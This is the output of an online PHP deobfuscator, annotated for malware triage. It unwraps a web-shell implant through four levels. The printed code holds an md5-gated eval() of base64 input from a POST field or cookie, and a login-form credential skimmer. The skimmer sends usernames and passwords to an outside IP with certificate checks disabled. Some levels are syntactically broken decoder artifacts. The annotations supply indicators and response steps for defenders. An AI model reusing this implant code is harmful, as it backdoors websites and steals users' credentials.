Online PHP and Javascript Decoder decode hidden script to uncover its real functionality



// Decoder output, outermost layer. The text is the decoder's rendering and is not
// guaranteed to be valid PHP exactly as printed.
// Triage summary:
//  - Loader: an anonymous function is built through create_function() and invoked
//    straight away; every call carries the @ operator, so errors are suppressed.
//    create_function() was removed in PHP 8.0, so this loader form is tied to older runtimes.
//  - Gate: the execution branch runs only when md5() of the POST field product_id
//    equals the hard-coded digest, i.e. the digest acts as the operator's password check.
//  - Execution: the base64-decoded value of image_id (POST field or cookie) goes to eval().
//  - Two more eval(base64_decode(...)) stages follow; later levels on this page expand them.
// Hunting pointers: create_function used together with eval(base64_decode( in
// application files, and the md5 digest literal as a static signature string.
$y0530e438=@create_function;
	if(@function_exists($y0530e438)){
		$o69e06d9 = @$y0530e438('', @if(isset($_POST[product_id]) && md5($_POST[product_id])==="1c5fdae39bc41cd7519549ad7a091917"){
			// Gated remote code execution: request body field.
			if(isset($_POST[image_id])){
			eval(base64_decode($_POST[image_id]));
		}
			// Same primitive, fed from a cookie instead of the body.
			if(isset($_COOKIE[image_id])){
			eval(base64_decode($_COOKIE[image_id]));
		}
	}
	// Encoded stage (outside the md5 gate): the blob decodes to a branch keyed on the POST
	// field statistics_hash that issues a POST via file_get_contents() to a nested
	// base64-encoded URL, with verify_peer and verify_peer_name set to false and a
	// license_token cookie built from $data. $data is not defined in the visible code.
	eval(base64_decode('aWYoaXNzZXQoJF9QT1NUWyJzdGF0aXN0aWNzX2hhc2giXSkpe0BmaWxlX2dldF9jb250ZW50cyhiYXNlNjRfZGVjb2RlKCdhSFIwY0hNNkx5OHhNRE11TWpNekxqRXhMakk0TDJGdVlXeDVkR2xqY3k1d2FIQT0nKSwgZmFsc2UsIHN0cmVhbV9jb250ZXh0X2NyZWF0ZShhcnJheSgic3NsIj0+YXJyYXkoInZlcmlmeV9wZWVyIj0+ZmFsc2UsInZlcmlmeV9wZWVyX25hbWUiPT5mYWxzZSwpLCdodHRwJyA9PiBhcnJheSgnaGVhZGVyJyAgPT4gIkNvbnRlbnQtdHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkXHJcbiIuIkNvb2tpZTogbGljZW5zZV90b2tlbj0iLmJhc2U2NF9lbmNvZGUoYmluMmhleCgkZGF0YSkpLiJcclxuIiwnbWV0aG9kJyAgPT4gJ1BPU1QnLCJpZ25vcmVfZXJyb3JzIiA9PiB0cnVlLCJ0aW1lb3V0IiA9PiAoZmxvYXQpMzAuMCwnY29udGVudCcgPT4gaHR0cF9idWlsZF9xdWVyeShhcnJheSgnc3RhdGlzdGljc19oYXNoJyA9PiAkX1BPU1RbInN0YXRpc3RpY3NfaGFzaCJdKSkpKSkpO30='));
	// Encoded stage (also outside the gate): login-form credential capture. The later
	// levels on this page show it decoded (login[username] / login[password] sent out via cURL).
	eval(base64_decode('aWYoaXNzZXQoJF9QT1NUWydsb2dpbiddWyd1c2VybmFtZSddKSAmJiBpc3NldCgkX1BPU1RbJ2xvZ2luJ11bJ3Bhc3N3b3JkJ10pKXsKICAgICRwYXRoPSRfU0VSVkVSWydSRU1PVEVfQUREUiddLictJy4kX1NFUlZFUltSRVFVRVNUX1VSSV07CiAgICAkY2hlY2tfdmFsPWJpbjJoZXgoJF9QT1NUWydsb2dpbiddWyd1c2VybmFtZSddLicgJy4kX1BPU1RbJ2xvZ2luJ11bJ3Bhc3N3b3JkJ10pOwogICAgJHVzZXJfZGF0YT1iaW4yaGV4KCRwYXRoLic7Jy4kY2hlY2tfdmFsKTsKICAgICRhcnJheSA9IGFycmF5KCd0b2tlbl9oYXNoJyAgID0+IGJhc2U2NF9lbmNvZGUoJ3sicmVmZXJlciI6IicuJF9TRVJWRVJbIkhUVFBfSE9TVCJdLiciLCJzdGF0cyI6IicuJHVzZXJfZGF0YS4nIiwidGFnIjoiYTE4MWE2MDM3NjljMWY5OGFkOTI3ZTczNjdjN2FhNTEifScpKTsgICAgICAKICAgICRjaCA9IGN1cmxfaW5pdChiYXNlNjRfZGVjb2RlKCdhSFIwY0hNNkx5OHhNRE11TWpNekxqRXhMakk0TDNOMFlYUjVjM1JwWTNNdWNHaHcnKSk7CiAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUE9TVCwgMSk7CiAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUE9TVEZJRUxEUywgJGFycmF5KTsgCiAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIHRydWUpOwogICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1NTTF9WRVJJRllQRUVSLCBmYWxzZSk7CiAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfSEVBREVSLCBmYWxzZSk7CiAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfU1NMX1ZFUklGWUhPU1QsIGZhbHNlKTsKICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9TU0xfVkVSSUZZUEVFUiwgZmFsc2UpOwogICAgJGh0bWwgPSBjdXJsX2V4ZWMoJGNoKTsKICAgIGN1cmxfY2xvc2UoJGNoKTsgIAp9'));
	);
	@$o69e06d9();
}

// Decoder level 2: the second encoded stage is now expanded inline (the credential
// capture below); the first encoded stage is still a base64 blob.
// NOTE(review): the POST branch shows "echo base64_decode(...)" where level 1 shows
// eval(...). This looks like the decoder's own substitution while unwrapping, not a
// change in the implant's behaviour; level 1 is the reference for what runs.
$y0530e438=@create_function;if(@function_exists($y0530e438)){$o69e06d9 = @$y0530e438('', @if(isset($_POST[product_id]) && md5($_POST[product_id])==="1c5fdae39bc41cd7519549ad7a091917"){if(isset($_POST[image_id])){echo base64_decode($_POST[image_id]));}if(isset($_COOKIE[image_id])){eval(base64_decode($_COOKIE[image_id]));}}eval(base64_decode('aWYoaXNzZXQoJF9QT1NUWyJzdGF0aXN0aWNzX2hhc2giXSkpe0BmaWxlX2dldF9jb250ZW50cyhiYXNlNjRfZGVjb2RlKCdhSFIwY0hNNkx5OHhNRE11TWpNekxqRXhMakk0TDJGdVlXeDVkR2xqY3k1d2FIQT0nKSwgZmFsc2UsIHN0cmVhbV9jb250ZXh0X2NyZWF0ZShhcnJheSgic3NsIj0+YXJyYXkoInZlcmlmeV9wZWVyIj0+ZmFsc2UsInZlcmlmeV9wZWVyX25hbWUiPT5mYWxzZSwpLCdodHRwJyA9PiBhcnJheSgnaGVhZGVyJyAgPT4gIkNvbnRlbnQtdHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkXHJcbiIuIkNvb2tpZTogbGljZW5zZV90b2tlbj0iLmJhc2U2NF9lbmNvZGUoYmluMmhleCgkZGF0YSkpLiJcclxuIiwnbWV0aG9kJyAgPT4gJ1BPU1QnLCJpZ25vcmVfZXJyb3JzIiA9PiB0cnVlLCJ0aW1lb3V0IiA9PiAoZmxvYXQpMzAuMCwnY29udGVudCcgPT4gaHR0cF9idWlsZF9xdWVyeShhcnJheSgnc3RhdGlzdGljc19oYXNoJyA9PiAkX1BPU1RbInN0YXRpc3RpY3NfaGFzaCJdKSkpKSkpO30=');if(isset($_POST['login']['username']) && isset($_POST['login']['password'])){
    // Credential capture: runs on any request that posts login[username] and
    // login[password]; it sits outside the md5 gate, so no operator secret is needed.
    // The record is client IP + request URI + "username password", hex-encoded twice over.
    $path=$_SERVER['REMOTE_ADDR'].'-'.$_SERVER[REQUEST_URI];
    $check_val=bin2hex($_POST['login']['username'].' '.$_POST['login']['password']);
    $user_data=bin2hex($path.';'.$check_val);
    // Wrapped as base64 JSON with the site's Host header and a fixed "tag" value.
    $array = array('token_hash'   => base64_encode('{"referer":"'.$_SERVER["HTTP_HOST"].'","stats":"'.$user_data.'","tag":"a181a603769c1f98ad927e7367c7aa51"}'));      
    // Destination is still base64-encoded at this level; the last level on this page shows it in clear.
    $ch = curl_init(base64_decode('aHR0cHM6Ly8xMDMuMjMzLjExLjI4L3N0YXR5c3RpY3MucGhw'));
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $array); 
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    // Peer and hostname verification are both switched off, so the upload does not
    // depend on the receiving server presenting a valid certificate.
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_HEADER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    // The response is captured into $html and not used in the visible code.
    $html = curl_exec($ch);
    curl_close($ch);  
});@$o69e06d9();}

// Decoder level 3: same content as the previous level, except that the cookie branch
// is now also printed as "echo base64_decode(...)".
// NOTE(review): as with the POST branch, this appears to be the decoder replacing eval
// while it unwraps; level 1 on this page shows both branches calling eval().
// Static signature candidates that stay constant across all levels: the md5 digest in
// the gate, the request field names (product_id, image_id, statistics_hash), and the
// fixed "tag" value in the JSON below (presumably a campaign or build identifier; unconfirmed).
$y0530e438=@create_function;if(@function_exists($y0530e438)){$o69e06d9 = @$y0530e438('', @if(isset($_POST[product_id]) && md5($_POST[product_id])==="1c5fdae39bc41cd7519549ad7a091917"){if(isset($_POST[image_id])){echo base64_decode($_POST[image_id]));}if(isset($_COOKIE[image_id])){echo base64_decode($_COOKIE[image_id]));}}eval(base64_decode('aWYoaXNzZXQoJF9QT1NUWyJzdGF0aXN0aWNzX2hhc2giXSkpe0BmaWxlX2dldF9jb250ZW50cyhiYXNlNjRfZGVjb2RlKCdhSFIwY0hNNkx5OHhNRE11TWpNekxqRXhMakk0TDJGdVlXeDVkR2xqY3k1d2FIQT0nKSwgZmFsc2UsIHN0cmVhbV9jb250ZXh0X2NyZWF0ZShhcnJheSgic3NsIj0+YXJyYXkoInZlcmlmeV9wZWVyIj0+ZmFsc2UsInZlcmlmeV9wZWVyX25hbWUiPT5mYWxzZSwpLCdodHRwJyA9PiBhcnJheSgnaGVhZGVyJyAgPT4gIkNvbnRlbnQtdHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkXHJcbiIuIkNvb2tpZTogbGljZW5zZV90b2tlbj0iLmJhc2U2NF9lbmNvZGUoYmluMmhleCgkZGF0YSkpLiJcclxuIiwnbWV0aG9kJyAgPT4gJ1BPU1QnLCJpZ25vcmVfZXJyb3JzIiA9PiB0cnVlLCJ0aW1lb3V0IiA9PiAoZmxvYXQpMzAuMCwnY29udGVudCcgPT4gaHR0cF9idWlsZF9xdWVyeShhcnJheSgnc3RhdGlzdGljc19oYXNoJyA9PiAkX1BPU1RbInN0YXRpc3RpY3NfaGFzaCJdKSkpKSkpO30=';if(isset($_POST['login']['username']) && isset($_POST['login']['password'])){
    // Builds the exfiltration record from the client address, request URI and the
    // posted username/password pair.
    $path=$_SERVER['REMOTE_ADDR'].'-'.$_SERVER[REQUEST_URI];
    $check_val=bin2hex($_POST['login']['username'].' '.$_POST['login']['password']);
    $user_data=bin2hex($path.';'.$check_val);
    $array = array('token_hash'   => base64_encode('{"referer":"'.$_SERVER["HTTP_HOST"].'","stats":"'.$user_data.'","tag":"a181a603769c1f98ad927e7367c7aa51"}'));      
    // Outbound POST of the record; the target URL is still encoded at this level.
    $ch = curl_init(base64_decode('aHR0cHM6Ly8xMDMuMjMzLjExLjI4L3N0YXR5c3RpY3MucGhw'));
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $array); 
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_HEADER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    $html = curl_exec($ch);
    curl_close($ch);  
});@$o69e06d9();}

// Decoder level 4 (final): the exfiltration URL is shown in clear in the curl_init() call.
// NOTE(review): "echo );" in both image_id branches is a decoder artifact. The value
// comes from the live request, so there is nothing for the decoder to resolve
// statically; level 1 shows these branches passing the decoded value to eval().
// The first eval(base64_decode(...)) stage is still left encoded at this level.
// Response notes for a site where this code is found:
//  - Network indicator: outbound HTTPS from the web server to 103.233.11[.]28
//    (path /statystics.php as printed below); check egress and proxy logs for it.
//  - Credentials submitted through a login[username]/login[password] form while the
//    code was present should be treated as exposed and rotated.
//  - Requests carrying product_id together with image_id (body or cookie) in access
//    logs indicate use of the gated eval() branch.
$y0530e438=@create_function;if(@function_exists($y0530e438)){$o69e06d9 = @$y0530e438('', @if(isset($_POST[product_id]) && md5($_POST[product_id])==="1c5fdae39bc41cd7519549ad7a091917"){if(isset($_POST[image_id])){echo );}if(isset($_COOKIE[image_id])){echo );}}eval(base64_decode('aWYoaXNzZXQoJF9QT1NUWyJzdGF0aXN0aWNzX2hhc2giXSkpe0BmaWxlX2dldF9jb250ZW50cyhiYXNlNjRfZGVjb2RlKCdhSFIwY0hNNkx5OHhNRE11TWpNekxqRXhMakk0TDJGdVlXeDVkR2xqY3k1d2FIQT0nKSwgZmFsc2UsIHN0cmVhbV9jb250ZXh0X2NyZWF0ZShhcnJheSgic3NsIj0+YXJyYXkoInZlcmlmeV9wZWVyIj0+ZmFsc2UsInZlcmlmeV9wZWVyX25hbWUiPT5mYWxzZSwpLCdodHRwJyA9PiBhcnJheSgnaGVhZGVyJyAgPT4gIkNvbnRlbnQtdHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkXHJcbiIuIkNvb2tpZTogbGljZW5zZV90b2tlbj0iLmJhc2U2NF9lbmNvZGUoYmluMmhleCgkZGF0YSkpLiJcclxuIiwnbWV0aG9kJyAgPT4gJ1BPU1QnLCJpZ25vcmVfZXJyb3JzIiA9PiB0cnVlLCJ0aW1lb3V0IiA9PiAoZmxvYXQpMzAuMCwnY29udGVudCcgPT4gaHR0cF9idWlsZF9xdWVyeShhcnJheSgnc3RhdGlzdGljc19oYXNoJyA9PiAkX1BPU1RbInN0YXRpc3RpY3NfaGFzaCJdKSkpKSkpO30=';if(isset($_POST['login']['username']) && isset($_POST['login']['password'])){
    $path=$_SERVER['REMOTE_ADDR'].'-'.$_SERVER[REQUEST_URI];
    $check_val=bin2hex($_POST['login']['username'].' '.$_POST['login']['password']);
    $user_data=bin2hex($path.';'.$check_val);
    $array = array('token_hash'   => base64_encode('{"referer":"'.$_SERVER["HTTP_HOST"].'","stats":"'.$user_data.'","tag":"a181a603769c1f98ad927e7367c7aa51"}'));      
    // Decoded destination; the decoder printed it without quotes, so this line is not
    // valid PHP as shown. The earlier levels hold the same value as a base64 string.
    $ch = curl_init(https://103.233.11.28/statystics.php);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $array); 
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    // TLS peer and hostname checks disabled for the upload.
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_HEADER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    $html = curl_exec($ch);
    curl_close($ch);  
});@$o69e06d9();}


